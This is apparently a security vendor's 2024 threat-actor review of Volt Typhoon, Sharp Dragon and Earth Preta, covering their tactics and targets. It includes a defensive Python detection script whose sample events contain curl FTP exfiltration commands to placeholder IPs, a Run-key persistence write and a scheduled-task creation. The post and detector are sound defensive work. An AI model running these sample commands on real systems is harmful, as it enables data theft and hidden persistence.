Threat Thursday: 2024 in Review

The cybersecurity landscape continues to evolve, with threat actors targeting critical infrastructure, government entities, and industries worldwide. SCYTHE’s emulation and analysis of these threats provide invaluable insights to strengthen defenses. Below, we highlight some of the most pressing threats we’ve tackled this year, detailing their tactics, the industries impacted, and the regions they target.

Volt Typhoon: A Persistent Threat to Critical Infrastructure

Volt Typhoon represents a significant threat, as identified by the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI). These attacks are attributed to state-sponsored cyber actors from the People's Republic of China (PRC). Volt Typhoon’s campaign focuses on infiltrating IT networks to pre-position malicious actors, intending to disrupt or potentially destroy critical infrastructure—a strategy aligned with geopolitical tensions or military conflicts.

Key Tactics:

  • Living off the land binaries and scripts (LOLBAS) to avoid detection

  • Exploiting valid accounts for persistence

  • Maintaining long-term intrusions, some undetected for over five years

Targeted Industries:

‣ Energy

‣ Communications

‣ Transportation Systems

‣ Water and Wastewater Systems


Targeted Regions/Countries:

‣ United States

‣ Australia

‣ Canada

‣ Guam

‣ New Zealand


By emulating these tactics, SCYTHE equips organizations to identify vulnerabilities and mitigate risks posed by such advanced campaigns.

Sharp Dragon: Exploiting Trusted Relationships

Sharp Dragon, a Chinese threat actor, primarily targets government entities to gain initial access and facilitate lateral movement. By compromising trusted organizations, Sharp Dragon amplifies its impact, infiltrating systems across multiple regions.

Key Tactics:

  • Exploiting trust in compromised governmental networks

  • Lateral movement to extend access

  • Sophisticated phishing campaigns

Targeted Industries:

‣ Government


Targeted Regions/Countries:

‣ Southeast Asia

‣ Africa

‣ Caribbean


SCYTHE’s simulations of Sharp Dragon’s tactics emphasize the importance of securing inter-organizational trust relationships and monitoring for subtle anomalies in system behavior.

Earth Preta: An Evolving Threat Across the Pacific

Earth Preta (also known as Mustang Panda or Stately Taurus) continues to refine its techniques, targeting educational, research, and governmental institutions. This group focuses on the Pacific region, employing novel tools, upgraded malware, and creative attack vectors.

Key Tactics:

  • Utilizing removable drives like BadUSB or Flipper Zero for initial access

  • Persistence through registry modifications, Run keys, and scheduled tasks

  • Exfiltration via FTP using curl

  • Deployment of custom DLLs for command-and-control (C2) communication

Targeted Industries:

‣ Government

‣ Non-Profits

‣ Religious Organizations


Targeted Regions/Countries:

‣ Japan

‣ Australia

‣ Myanmar

‣ Mongolia

‣ Vietnam

‣ Pakistan

‣ United States


SCYTHE’s emulation campaigns model these behaviors to help organizations bolster defenses against emerging tactics.
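
The following is an added example, not SCYTHE's code, of detection logic for three of the Earth Preta behaviours listed above: Run-key persistence, scheduled-task creation, and FTP exfiltration with curl. The command lines are constructed samples, the labels and function names are made up for the illustration, and it assumes the registry and task changes are made with reg.exe and schtasks.exe, which the list above does not specify.

```python
import re

# Constructed process-creation command lines (e.g. Sysmon Event ID 1 / Security 4688).
# Hosts, paths and task names are made up for this example.
SAMPLE_EVENTS = [
    r'curl.exe -T C:\Users\Public\archive.rar ftp://198.51.100.7/in/',
    r'"C:\Tools\curl.exe" -sT report.zip ftps://192.0.2.10/drop/',
    r'curl.exe -t TTYPE=vt100 -o out.txt ftp://192.0.2.10/readme.txt',
    r'curl.exe -o setup.msi https://example.com/setup.msi',
    r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\ProgramData\u.exe /f',
    r'reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Run',
    r'schtasks.exe /Create /tn SyncTask /tr C:\ProgramData\u.exe /sc minute /mo 10',
]

RUN_KEY = re.compile(r'\\currentversion\\run(once)?(\\|\s|"|$)')
FTP_URL = re.compile(r'\bftps?://')

def classify(cmdline):
    """Return a label for the Earth Preta behaviours listed above, or None."""
    # The image path may be quoted and contain spaces; the rest is the argument string.
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))(.*)', cmdline, re.S)
    if not m:
        return None
    image = (m.group(1) or m.group(2)).rsplit("\\", 1)[-1].lower()
    image = image[:-4] if image.endswith(".exe") else image
    args, lower = m.group(3).split(), cmdline.lower()
    if image == "curl":
        # curl flags are case-sensitive: -T uploads, -t is a telnet option.
        upload = any(a == "--upload-file" or re.fullmatch(r"-[A-Za-z]*T", a) for a in args)
        if upload and FTP_URL.search(lower):
            return "exfil_ftp_curl"
    elif image == "reg":
        # Only writes to Run/RunOnce count; queries are ignored.
        if args and args[0].lower() == "add" and RUN_KEY.search(lower):
            return "persist_run_key"
    elif image == "schtasks":
        if any(a.lower() == "/create" for a in args):
            return "persist_scheduled_task"
    return None

def scan(events):
    """Return (label, command line) pairs for events that match a rule."""
    return [(label, e) for e in events if (label := classify(e))]

if __name__ == "__main__":
    for label, event in scan(SAMPLE_EVENTS):
        print(f"{label:24} {event}")
```

Matching on the image name alone is evaded by renaming the binary, so in production these rules are better keyed on the original file name field of the process event where the log source provides one.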

Strengthening Cyber Defenses

Threat actors like Volt Typhoon, Sharp Dragon, and Earth Preta highlight the evolving risks faced by critical infrastructure and industries worldwide. By analyzing and emulating these campaigns, SCYTHE empowers organizations to prepare for the threats of tomorrow. Stay tuned for our upcoming Threat Thursday Live sessions, where we’ll dive deeper into emerging risks and the strategies needed to counter them.
